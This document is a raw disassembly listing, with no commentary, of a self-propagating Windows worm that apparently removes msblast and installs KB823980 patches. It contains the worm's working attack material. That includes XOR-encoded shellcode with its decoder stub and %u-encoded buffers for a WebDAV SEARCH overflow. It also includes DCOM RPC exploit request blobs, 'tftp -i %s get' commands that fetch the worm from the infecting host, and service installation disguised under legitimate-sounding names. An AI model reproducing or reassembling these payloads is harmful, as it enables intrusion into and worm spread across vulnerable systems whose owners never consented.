db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_404000 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2Adword_404004 dd 77E377F9h ; resolved to->ADVAPI32.QueryServiceConfig2Adword_404008 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40400C dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_404010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_404014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_404018 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_40401C dd 77DE5EB8h ; resolved to->ADVAPI32.QueryServiceStatus ; sub_402540+17A�r ...
dword_404020 dd 77DF5462h ; resolved to->ADVAPI32.QueryServiceConfigAdword_404024 dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_404028 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_40402C dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_402540+11�r ...
dword_404030 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceAdword_404034 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4023E0+11D�r ...
dword_404038 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_402540+60�r ...
dword_40403C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_404040 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_404044 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_404048 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA align 10h
dword_404050 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandledword_404054 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_404058 dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEcho align 10h
dword_404060 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_404064 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_402C40+2A2�r
dword_404068 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_40406C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_404070 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_404074 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_402A00+77�r
dword_404078 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_402A00+8B�r
dword_40407C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_404080 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_404084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_404088 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_402C40+F�r
dword_40408C dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; sub_402540+7E�r
dword_404090 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_402540+1CF�r
dword_404094 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_404098 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40409C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4040A0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4040A4 dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4040A8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_402970+A�r
dword_4040AC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_402A00+30�r
dword_4040B0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4040B4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_401660+42�r
dword_4040B8 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_4040BC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_401990+A1�r ...
dword_4040C0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401B90+4C�r ...
dword_4040C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401470+F9�r ...
dword_4040C8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401280+6C�r ...
dword_4040CC dd 7C87109Dh ; resolved to->KERNEL32.FreeConsoledword_4040D0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4040D4 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4040D8 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_4040DC dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_4040E0 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401006+DB�r ...
dword_4040E4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4040E8 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401780+1D3�r ...
align 10h
dword_4040F0 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_4040F4 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_4040F8 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_4040FC dd 77C39D67h ; resolved to->MSVCRT._inittermdword_404100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_401B90+80�r ...
dword_404104 dd 77C371BCh ; resolved to->MSVCRT.sranddword_404108 dd 77C29CC5h dword_40410C dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenvdword_404110 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_404114 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_404118 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_40411C dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_4015E0+E�r ...
dword_404120 dd 77C47BE0h ; resolved to->MSVCRT.strrchrdword_404124 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_404128 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_40412C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_404130 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfpdword_404134 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_404138 dd 77C29CDDh dword_40413C dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_401280+12B�r ...
dword_404140 dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; sub_4023E0+64�r
align 8
dword_404148 dd 7E45A045h ; resolved to->USER32.ExitWindowsEx align 10h
dword_404150 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_402B20+57�r ...
dword_404154 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_402C40+6E�r ...
dword_404158 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40415C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_402C40+7E�r
dword_404160 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_401EA0+1B�r
dword_404164 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_401C80+41�r ...
dword_404168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401B90+1E�r ...
dword_40416C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401B90+65�r ...
dword_404170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_401990+15D�r ...
dword_404174 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4020E0+7�r ...
dword_404178 dd 71AB3E00h ; resolved to->WS2_32.binddword_40417C dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_404180 dd 71AB88D3h ; resolved to->WS2_32.listendword_404184 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_401990+137�r
dword_404188 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_401990+20�r
dword_40418C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_404190 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_404194 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4020E0+27�r ...
dd 0
dword_40419C dd 42D779A3h dd 2 dup(0)
dword_4041A8 dd 0FFFFFFFFh, 4030BCh, 4030D0h, 393h dup(0)dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 aU5390U665eU66a db '%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f%u66ad%u4e3d%u740'
; DATA XREF: sub_401F30+A4�o
db '0%u9023%u612c%u5090%u6659%u90ad%u612c%u548d%u7088%u548d%u908a%u54'
db '8d%u708a%u548d%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3%u6'
db '099',0
align 4
aFfilomidomfafd db 'ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpai'
; DATA XREF: sub_401F30+C6�o
db 'nlnpeppppppgekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppilefpaid'
db 'oiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdne'
db 'oeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihfokppog'
db 'olpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoih'
db 'hppppppcececece',0
align 10h
aU5951U6858U759 db '%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759'
; DATA XREF: sub_401F30+45�o
db 'f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u68'
db '58%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018',0
align 4
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
word_40537C dw 3D30h ; DATA XREF: sub_401280+19D�r
dw 3D9Fh
dd 3D8B3D8Ah, 3D953D91h, 3D9D3D97h, 3DBC3DA1h, 3DE93DF3h
dd 0DCA03D9Ah, 0CA64CA60h, 0CA68CA67h, 0CA71CA66h, 0CB5DCA82h
dd 0CBD0CA62h, 0D20CCBCFh, 0D235D22Ah, 0D344D248h, 0D354D357h
dd 0D360D35Ch, 0D353D362h, 0D3A1D35Fh, 0D3A3D3A2h, 0D39CD390h
dd 0DA6DD39Eh, 0DA05DA04h, 0DA47DA11h, 0DA6ADA00h, 0DB91DAC7h
dd 0DA06DA08h, 0DA58DA3Fh, 0DA45DA59h, 0DA4BDA3Fh, 0DA68DA55h
dd 0DB8ADAC5h, 0DBEADBDEh, 0DCA0DC6Dh, 0DC75DCA3h, 0DCB9DCA2h
dd 0DC71DCBAh, 0DCA6DC70h
off_405414 dd offset aHttpDownload_m ; DATA XREF: sub_401780:loc_4018AF�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_1 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_2 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_3 ; "http://download.microsoft.com/download/"...
off_405424 dd offset aHttpDownload_0 ; DATA XREF: sub_401780+120�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_4 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_5 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_6 ; "http://download.microsoft.com/download/"...
dword_405434 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_40547C dd 3000005h, 10hdword_405484 dd 3E8h dd 0E5h, 3D0h, 40001h, 60005h, 1, 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 2 dup(0)
dword_4057DC dd 20h ; sub_402170+29�w
dword_4057E0 dd 0 dword_4057E4 dd 20h ; sub_402170+2E�w
dword_4057E8 dd 5C005Ch aC1234561111111: ; DATA XREF: sub_402170+7B�o
unicode 0, <\C$\123456111111111111111.doc>,0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402170+55�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dword_40584C dd 7F08321Ah db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
db 126h dup(90h)
; ---------------------------------------------------------------------------
loc_40597E: ; DATA XREF: sub_401F30+13C�o
jmp short loc_405990
; =============== S U B R O U T I N E =======================================
sub_405980 proc far ; CODE XREF: sub_405980:loc_405990�p
pop edx
dec edx
xor ecx, ecx
mov cx, 176h
loc_405988: ; CODE XREF: sub_405980+C�j
xor byte ptr [edx+ecx], 99h
loop loc_405988
jmp short loc_405995
; ---------------------------------------------------------------------------
loc_405990: ; CODE XREF: seg000:loc_40597E�j
call near ptr sub_405980
loc_405995: ; CODE XREF: sub_405980+E�j
jo short loc_4059F8
cdq
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 21h
dd 0E6646995h, 0E9129912h, 0D9123485h, 12411291h, 6A9AA5EAh
dd 9AE1EF12h, 0B9E7126Ah, 0D712629Ah, 0CF74AA8Dh, 0A612C8CEh
dd 6B12629Ah, 6AC097F3h, 0C091ED3Fh, 9D5E1AC6h, 0C0707BDCh
dd 5412C7C6h, 9ABDDF12h, 9A78485Ah, 0FF50AA58h, 0DF129112h
dd 585A9A85h, 589A9B78h, 5A9A9912h
; ---------------------------------------------------------------------------
loc_4059F8: ; CODE XREF: sub_405980:loc_405995�j
adc ah, [ebx+12h]
outsb
sbb bl, [edi-69h]
adc cl, [ecx-0Dh]
call far ptr 9999h:99ED71C0h
sbb bl, [edi-6Ch]
retf
sub_405980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0CFh, 66h, 0CEh
dd 4112C365h, 71C09AF3h, 999999F8h, 12DD751Ah, 0C089F36Dh
dd 7B179D10h, 0C9C9C962h, 0F398F3C9h, 6DCE669Bh, 0C7104112h
dd 0A5C710A1h, 0FFD9C710h, 98B5DF5Eh, 89DE1498h, 59AACFC9h
dd 0F3C9C9C9h, 14C9C998h, 9B5EA5CEh, 99FDF4FAh, 0CE66C9CBh
dd 9B9E5E71h, 5E9B9999h, 0FAFA9DDEh, 89F3FAFAh, 0CE66CACEh
dd 0CE66CA61h, 0CE66C965h, 3559AA75h, 60EC591Ch, 0CACFCBC8h
dd 0C0C34B66h, 0AA777B32h, 9A715A59h, 0DE666666h, 0EBC9EDFCh
dd 0FDD8FAF6h, 0EAFCEBFDh, 0EBDA99EAh, 0FCEDF8FCh, 0FAF6EBC9h
dd 0D8EAEAFCh, 0F0E1DC99h, 0EBF1CDEDh, 99FDF8FCh, 0FDF8F6D5h
dd 0EBFBF0D5h, 0D8E0EBF8h, 0ABEAEE99h, 99ABAAC6h, 0CAD8CACEh
dd 0FCF2FAF6h, 0FA99D8EDh, 0FCF7F7F6h, 0FA99EDFAh, 0FCEAF6F5h
dd 0F2FAF6EAh, 99EDFCh
dword_405AF4 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 0
dd offset aILoveMyWifeBab ; "=========== I love my wife & baby :)~~~"...
aCopyDllcacheTf db 'copy dllcache\tftpd.exe wins\svchost.exe',0Ah
; DATA XREF: sub_401C80+175�o
db 0Dh,0
align 4
aWinsDllhost_ex db 'wins\DLLHOST.EXE',0Ah ; DATA XREF: sub_401C80+1AB�o
; sub_401C80+1BD�o
db 0Dh,0
align 4
word_405B68 dw 29Ah ; DATA XREF: sub_401990+5A�w
; sub_401990+81�r ...
align 4
aRpctftpd db 'RpcTftpd',0 ; DATA XREF: sub_401280+41�o
; sub_401280+E7�o ...
align 4
aRpcpatch db 'RpcPatch',0 ; DATA XREF: sub_401280+37�o
; sub_401660+57�o ...
align 4
aDirDllcacheTft db 'dir dllcache\tftpd.exe',0Ah ; DATA XREF: sub_401C80+11B�o
db 0Dh,0
align 10h
dword_405BA0 dd 4 ; sub_402880:loc_4028F6�r
byte_405BA4 db 3Dh ; DATA XREF: sub_401100:loc_40115A�r
db 3Dh, 2 dup(0CAh)
dd 0D2D2CBCAh, 0DADAD3D3h, 0DCDBh
aDirWinsDllhost db 'dir wins\dllhost.exe',0Ah ; DATA XREF: sub_401C80+D2�o
db 0Dh,0
align 4
aGetHttp1_1Acce db 'GET / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+B5�o
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0Dh
db 0Ah
db 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0Dh,0Ah
db 'Host: ',0
align 4
aConnectionKeep db 0Dh,0Ah ; DATA XREF: sub_402C40+95�o
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aILoveMyWifeBab db '=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice'
; DATA XREF: seg000:00405B24�o
db ': 2004 will remove myself:)~~ sorry zhongli~~~=========== wins',0
align 4
aHttpDownload_6 db 'http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b'
; DATA XREF: seg000:00405430�o
db '1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_5 db 'http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b'
; DATA XREF: seg000:0040542C�o
db '576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_4 db 'http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9'
; DATA XREF: seg000:00405428�o
db '125-6858b759e977/Windows2000-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_0 db 'http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8'
; DATA XREF: seg000:off_405424�o
db 'ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe',0
align 4
aHttpDownload_3 db 'http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8'
; DATA XREF: seg000:00405420�o
db 'a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_2 db 'http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9'
; DATA XREF: seg000:0040541C�o
db 'ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_1 db 'http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8'
; DATA XREF: seg000:00405418�o
db 'd48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_m db 'http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-a'
; DATA XREF: seg000:off_405414�o
db 'aee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe',0
align 4
aTftpISGetSvcho db 'tftp -i %s get svchost.exe wins\SVCHOST.EXE',0Ah
; DATA XREF: sub_401210+48�o
db 0Dh,0
align 4
aTftpISGetDllho db 'tftp -i %s get dllhost.exe wins\DLLHOST.EXE',0Ah
; DATA XREF: sub_401210+34�o
db 0Dh,0
align 4
aNetworkConnect db 'Network Connections Sharing',0 ; DATA XREF: sub_4015E0+57�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_4015E0+52�o
; sub_4023E0+59�o
aMsdtc db 'MSDTC',0 ; DATA XREF: sub_4015E0+4D�o
align 4
aSWinsSvchost_e db '%s\wins\svchost.exe',0 ; DATA XREF: sub_4015E0+2D�o
aSDllcacheTftpd db '%s\dllcache\tftpd.exe',0 ; DATA XREF: sub_4015E0+19�o
align 4
aWinsClient db 'WINS Client',0 ; DATA XREF: sub_401660+52�o
aDllhost_exe db 'DLLHOST.EXE',0 ; DATA XREF: sub_401660+4D�o
; sub_401C80+EC�o
aBrowser db 'Browser',0 ; DATA XREF: sub_401660+48�o
aSWinsDllhost_e db '%s\wins\DLLHOST.EXE',0 ; DATA XREF: sub_401660+24�o
aSNOZQ db '%s -n -o -z -q',0 ; DATA XREF: sub_401780+15C�o
align 4
dword_4061A8 dd 53637052h dword_4061AC dd 69767265h dword_4061B0 dd 61506563h dword_4061B4 dd 652E6B63h word_4061B8 dw 6578h ; DATA XREF: sub_401780+102�r
byte_4061BA db 0 ; DATA XREF: sub_401780+10D�r
align 4
dword_4061BC dd 74737973h, 32336D65h, 3Eh ; sub_401C80+8E�o ...
aTimeoutOccurre db 'Timeout occurred',0 ; DATA XREF: sub_401B90+95�o
align 4
aTransferSucces db 'Transfer successful',0 ; DATA XREF: sub_401B90+86�o
aTftpd_exe db 'TFTPD.EXE',0 ; DATA XREF: sub_401C80+148�o
align 4
aTftpd_exe_0 db 'tftpd.exe',0 ; DATA XREF: sub_401C80+135�o
align 4
aDllhost_exe_0 db 'dllhost.exe',0 ; DATA XREF: sub_401C80+103�o
aMicrosoftWindo db 'Microsoft Windows',0 ; DATA XREF: sub_401C80+77�o
align 4
aMicrosoft_com db 'microsoft.com',0 ; DATA XREF: sub_401E80�o
align 4
word_406238 dw 0A0Dh ; DATA XREF: sub_401F30+17E�r
byte_40623A db 0 ; DATA XREF: sub_401F30+185�r
align 4
aHttp1_1Host127 db ' HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_401F30+100�o
db 'Host: 127.0.0.1',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-length: 377',0Dh,0Ah
db 0Dh,0Ah
db 'YXYX',0
aSearch db 'SEARCH /',0 ; DATA XREF: sub_401F30+A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4022A0+1C�o
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980',0
; DATA XREF: sub_402390+2D�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980',0
; DATA XREF: sub_402390:loc_4023AC�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980',0
; DATA XREF: sub_402390+8�o
align 4
aManagesNetwork db 'Manages network configuration by updating DNS names IP address.',0
; DATA XREF: sub_4023E0+D1�o
aSWinsS db '%s\wins\%s',0 ; DATA XREF: sub_4023E0+4D�o
align 4
aDSWins db '-d%s\wins',0 ; DATA XREF: sub_402540+33�o
align 4
aRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: sub_4027B0�o
align 4
aSMsblast_exe db '%s\msblast.exe',0 ; DATA XREF: sub_402A00+63�o
align 4
aMsblast db 'msblast',0 ; DATA XREF: sub_402A00+8�o
a411 db '411',0 ; DATA XREF: sub_402C40+20A�o
aSearchHttp1_1H db 'SEARCH / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+19E�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
aServerMicrosof db 'Server: Microsoft-IIS/5.0',0 ; DATA XREF: sub_402C40+13F�o
align 4
aSSS db '%s%s%s',0 ; DATA XREF: sub_402C40+BA�o
align 4
dword_406414 dd 1 align 10h
dword_406420 dd 0 ; sub_402B20+CA�r
dword_406424 dd 0 ; sub_401F30+50�r ...
dword_406428 dd 0 ; sub_402170+100�w
dword_40642C dd 0 ; sub_4020E0+13�r
dword_406430 dd 10h dup(0) ; sub_402AB0+3F�o ...
dword_406470 dd 0 ; sub_402130+35�w ...
align 8
dword_406478 dd 0 align 10h
dword_406480 dd 0 ; sub_402170+C7�w
dd 1Bh dup(0)
dword_4064F0 dd 0 ; sub_402170+D3�w
dword_4064F4 dd 0 ; sub_402170+DF�w
dd 0Bh dup(0)
dword_406524 dd 0 ; sub_402170+EF�w
dword_406528 dd 0 ; sub_402170+F9�w
dd 5 dup(0)
dword_406540 dd 0 ; sub_402170+11E�w
dd 2Eh dup(0)
dword_4065FC dd 0 ; sub_402170+124�w
dd 74h dup(0)
dword_4067D0 dd 0 dword_4067D4 dd 0 dword_4067D8 dd 0 dword_4067DC dd 0 dword_4067E0 dd 0B3h dup(0) dword_406AAC dd 0Fh dup(0) dword_406AE8 dd 146h dup(0) seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 407000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_407000 dd 11Ch dup(0) dword_407470 dd 0 ; sub_4020E0+33�r
dword_407474 dd 0 ; sub_402170+10A�w
dword_407478 dd 8 dup(0) ; sub_401210+43�o ...
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_4011C0+14�o
; sub_4015E0+14�o ...
dd 3Dh dup(0)
dword_4075A0 dd 0 ; sub_401280+9C�r ...
dword_4075A4 dd 0 ; sub_401470+136�r ...
dword_4075A8 dd 20h dup(0) ; sub_401C80+18C�o
dword_407628 dd 20h dup(0) ; sub_401C80+15C�o
